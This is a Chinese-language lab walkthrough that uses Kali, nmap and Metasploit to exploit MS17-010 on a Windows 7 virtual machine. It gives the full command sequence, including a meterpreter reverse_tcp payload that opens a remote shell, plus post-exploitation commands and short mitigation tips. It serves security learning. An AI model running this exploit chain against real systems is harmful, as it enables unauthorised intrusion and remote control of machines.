实战准备
- 软件:Vmware Workstation 17
- 攻击机:Kali
- 靶机环境:Win7
- 工具:Nmap扫描工具(NetWork Mapper)、Metasploit 渗透框架
实战开始
使用sudo su命令进入kali的root下
使用命令 nmap -A -T4 -sV 192.168.72.* 来全面扫描在192.168.72.*网段下的所有网络,找到win7系统ip地址为192.168.72.131,查看445端口是否在开启状态
确定ip后开始使用msfconsole命令准备开始渗透
使用 命令 search ms17-010 搜索名为ms17-010的漏洞,0,1,4为利用攻击模块。2,3为辅助模块
先使用命令 use 3 来使用3模块确定漏洞是否存在,然后查看信息:show options
Required中为yes选项是一定要填写的而且是缺少目标主机未设置,我们需要给他添加目标主机,使用命令set rhost 192.168.72.131 并查看 show options
使用 命令:run 扫描目标机器是否存在ms17-010,发现主机易受ms17-010攻击!
ok,开始配置,切换到攻击模块:use 0,发现没有配置有效负载,我们来配置下:set payload windows/x64/meterpreter/reverse_tcp
查看信息:show options,确定攻击机和目标机ip是否一致,发现缺少目标机器的IP,添加目标机器IP地址:192.168.72.131,命令:set rhosts 192.168.72.131,并再次查看信息:show options。
10攻击:run
11使用meterpreter的一系列命令可以开始渗透操作。例如:show_mount列出目标机所有驱动,screenshot截取目标机当前屏幕。
kali
目标机win7
MS17-010漏洞防范
- 更新系统
- 打开防火墙
- 安装杀毒软件
声明
内容只代表作者本人观点,本文仅作为网络安全学习参考。